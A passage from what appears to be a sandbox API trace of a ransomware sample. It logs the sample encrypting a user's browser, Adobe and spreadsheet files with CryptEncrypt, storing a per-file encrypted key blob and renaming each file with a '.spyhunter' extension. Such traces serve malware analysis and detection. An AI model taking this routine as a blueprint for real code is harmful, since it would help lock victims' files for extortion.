halpmcxz\\appdata\\roaming\\aji7zeyrgbo-im.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AJI7ZEyRGBo-im.csv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aji7zeyrgbo-im.csv.spyhunter")) returned 1 [0140.911] GetProcessHeap () returned 0x2c0000 [0140.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.911] GetProcessHeap () returned 0x2c0000 [0140.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.911] GetProcessHeap () returned 0x2c0000 [0140.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81540 | out: hHeap=0x2c0000) returned 1 [0140.981] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f408 | out: pbBuffer=0x248f408) returned 1 [0140.981] GetProcessHeap () returned 0x2c0000 [0140.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.981] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f400*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f400*=0x30) returned 1 [0140.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0140.982] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json") returned 103 [0140.983] StrStrW (lpFirst="addons.json", lpSrch=".txt") returned 0x0 [0140.983] GetProcessHeap () returned 0x2c0000 [0140.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0140.983] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f3c4*=0x18, lpOverlapped=0x0) returned 1 [0140.983] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.984] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x248f3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f3c4*=0x18, lpOverlapped=0x0) returned 1 [0140.984] GetProcessHeap () returned 0x2c0000 [0140.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0140.984] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.984] WriteFile (in: hFile=0x16c, lpBuffer=0x248f404*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3c4, lpOverlapped=0x0 | out: lpBuffer=0x248f404*, lpNumberOfBytesWritten=0x248f3c4*=0x4, lpOverlapped=0x0) returned 1 [0140.984] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3c4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f3c4*=0x30, lpOverlapped=0x0) returned 1 [0140.984] CloseHandle (hObject=0x16c) returned 1 [0140.984] GetProcessHeap () returned 0x2c0000 [0140.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0140.984] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.spyhunter") returned 113 [0140.984] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json.spyhunter")) returned 1 [0140.985] GetProcessHeap () returned 0x2c0000 [0140.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0140.985] GetProcessHeap () returned 0x2c0000 [0140.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.985] GetProcessHeap () returned 0x2c0000 [0140.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67cc8 | out: hHeap=0x2c0000) returned 1 [0140.985] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f408 | out: pbBuffer=0x248f408) returned 1 [0140.985] GetProcessHeap () returned 0x2c0000 [0140.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.985] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f400*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f400*=0x30) returned 1 [0140.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0140.986] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl") returned 131 [0140.986] StrStrW (lpFirst="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpSrch=".txt") returned 0x0 [0140.986] GetProcessHeap () returned 0x2c0000 [0140.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0140.986] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f3c4*=0x3a5, lpOverlapped=0x0) returned 1 [0141.002] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffc5b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.002] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x3a5, lpNumberOfBytesWritten=0x248f3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f3c4*=0x3a5, lpOverlapped=0x0) returned 1 [0141.004] GetProcessHeap () returned 0x2c0000 [0141.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.004] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.006] WriteFile (in: hFile=0x16c, lpBuffer=0x248f404*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3c4, lpOverlapped=0x0 | out: lpBuffer=0x248f404*, lpNumberOfBytesWritten=0x248f3c4*=0x4, lpOverlapped=0x0) returned 1 [0141.006] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3c4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f3c4*=0x30, lpOverlapped=0x0) returned 1 [0141.006] CloseHandle (hObject=0x16c) returned 1 [0141.006] GetProcessHeap () returned 0x2c0000 [0141.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.006] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.spyhunter") returned 141 [0141.006] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl.spyhunter")) returned 1 [0141.007] GetProcessHeap () returned 0x2c0000 [0141.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.007] GetProcessHeap () returned 0x2c0000 [0141.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.007] GetProcessHeap () returned 0x2c0000 [0141.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc43e8 | out: hHeap=0x2c0000) returned 1 [0141.007] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f400 | out: pbBuffer=0x248f400) returned 1 [0141.008] GetProcessHeap () returned 0x2c0000 [0141.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.008] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3f8*=0x30) returned 1 [0141.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.008] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata") returned 98 [0141.008] StrStrW (lpFirst="addressbook.acrodata", lpSrch=".txt") returned 0x0 [0141.008] GetProcessHeap () returned 0x2c0000 [0141.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.008] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f3bc*=0x1517, lpOverlapped=0x0) returned 1 [0141.133] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffeae9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.134] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1517, lpNumberOfBytesWritten=0x248f3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f3bc*=0x1517, lpOverlapped=0x0) returned 1 [0141.134] GetProcessHeap () returned 0x2c0000 [0141.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.134] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.134] WriteFile (in: hFile=0x16c, lpBuffer=0x248f3fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3bc, lpOverlapped=0x0 | out: lpBuffer=0x248f3fc*, lpNumberOfBytesWritten=0x248f3bc*=0x4, lpOverlapped=0x0) returned 1 [0141.134] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f3bc*=0x30, lpOverlapped=0x0) returned 1 [0141.134] CloseHandle (hObject=0x16c) returned 1 [0141.134] GetProcessHeap () returned 0x2c0000 [0141.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.134] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.spyhunter") returned 108 [0141.135] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata.spyhunter")) returned 1 [0141.135] GetProcessHeap () returned 0x2c0000 [0141.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.135] GetProcessHeap () returned 0x2c0000 [0141.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.135] GetProcessHeap () returned 0x2c0000 [0141.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67980 | out: hHeap=0x2c0000) returned 1 [0141.135] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f400 | out: pbBuffer=0x248f400) returned 1 [0141.135] GetProcessHeap () returned 0x2c0000 [0141.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.136] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3f8*=0x30) returned 1 [0141.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YzoyKGTiY5IBmh7.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\yzoykgtiy5ibmh7.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.136] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YzoyKGTiY5IBmh7.xls") returned 70 [0141.136] StrStrW (lpFirst="YzoyKGTiY5IBmh7.xls", lpSrch=".txt") returned 0x0 [0141.136] GetProcessHeap () returned 0x2c0000 [0141.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.136] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f3bc*=0x2800, lpOverlapped=0x0) returned 1 [0141.137] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.137] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f3bc*=0x2800, lpOverlapped=0x0) returned 1 [0141.137] GetProcessHeap () returned 0x2c0000 [0141.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.137] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.137] WriteFile (in: hFile=0x16c, lpBuffer=0x248f3fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3bc, lpOverlapped=0x0 | out: lpBuffer=0x248f3fc*, lpNumberOfBytesWritten=0x248f3bc*=0x4, lpOverlapped=0x0) returned 1 [0141.137] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f3bc*=0x30, lpOverlapped=0x0) returned 1 [0141.137] CloseHandle (hObject=0x16c) returned 1 [0141.141] GetProcessHeap () returned 0x2c0000 [0141.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.141] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YzoyKGTiY5IBmh7.xls.spyhunter") returned 80 [0141.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YzoyKGTiY5IBmh7.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\yzoykgtiy5ibmh7.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YzoyKGTiY5IBmh7.xls.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\yzoykgtiy5ibmh7.xls.spyhunter")) returned 1 [0141.142] GetProcessHeap () returned 0x2c0000 [0141.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.142] GetProcessHeap () returned 0x2c0000 [0141.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.142] GetProcessHeap () returned 0x2c0000 [0141.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81b28 | out: hHeap=0x2c0000) returned 1 [0141.142] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3f8 | out: pbBuffer=0x248f3f8) returned 1 [0141.142] GetProcessHeap () returned 0x2c0000 [0141.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.142] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3f0*=0x30) returned 1 [0141.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\F6NhUKYWn.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\ysqy-zmw\\f6nhukywn.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0141.143] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\F6NhUKYWn.xls") returned 73 [0141.143] StrStrW (lpFirst="F6NhUKYWn.xls", lpSrch=".txt") returned 0x0 [0141.143] GetProcessHeap () returned 0x2c0000 [0141.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.143] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f3b4*=0x2800, lpOverlapped=0x0) returned 1 [0141.144] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.144] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f3b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f3b4*=0x2800, lpOverlapped=0x0) returned 1 [0141.144] GetProcessHeap () returned 0x2c0000 [0141.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.144] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.144] WriteFile (in: hFile=0x170, lpBuffer=0x248f3f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3b4, lpOverlapped=0x0 | out: lpBuffer=0x248f3f4*, lpNumberOfBytesWritten=0x248f3b4*=0x4, lpOverlapped=0x0) returned 1 [0141.144] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f3b4*=0x30, lpOverlapped=0x0) returned 1 [0141.144] CloseHandle (hObject=0x170) returned 1 [0141.148] GetProcessHeap () returned 0x2c0000 [0141.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.148] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\F6NhUKYWn.xls.spyhunter") returned 83 [0141.148] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\F6NhUKYWn.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\ysqy-zmw\\f6nhukywn.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\F6NhUKYWn.xls.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\ysqy-zmw\\f6nhukywn.xls.spyhunter")) returned 1 [0141.188] GetProcessHeap () returned 0x2c0000 [0141.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.188] GetProcessHeap () returned 0x2c0000 [0141.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.188] GetProcessHeap () returned 0x2c0000 [0141.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5ab8 | out: hHeap=0x2c0000) returned 1 [0141.188] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3f8 | out: pbBuffer=0x248f3f8) returned 1 [0141.190] GetProcessHeap () returned 0x2c0000 [0141.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.190] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3f0*=0x30) returned 1 [0141.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0141.265] StrStrW (lpFirst="folder.ico", lpSrch=".txt") returned 0x0 [0141.265] GetProcessHeap () returned 0x2c0000 [0141.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0141.265] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f3b4*=0x2800, lpOverlapped=0x0) returned 1 [0141.286] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.286] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f3b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f3b4*=0x2800, lpOverlapped=0x0) returned 1 [0141.287] GetProcessHeap () returned 0x2c0000 [0141.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0141.287] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.287] WriteFile (in: hFile=0x158, lpBuffer=0x248f3f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3b4, lpOverlapped=0x0 | out: lpBuffer=0x248f3f4*, lpNumberOfBytesWritten=0x248f3b4*=0x4, lpOverlapped=0x0) returned 1 [0141.287] WriteFile (in: hFile=0x158, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f3b4*=0x30, lpOverlapped=0x0) returned 1 [0141.287] CloseHandle (hObject=0x158) returned 1 [0141.287] GetProcessHeap () returned 0x2c0000 [0141.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 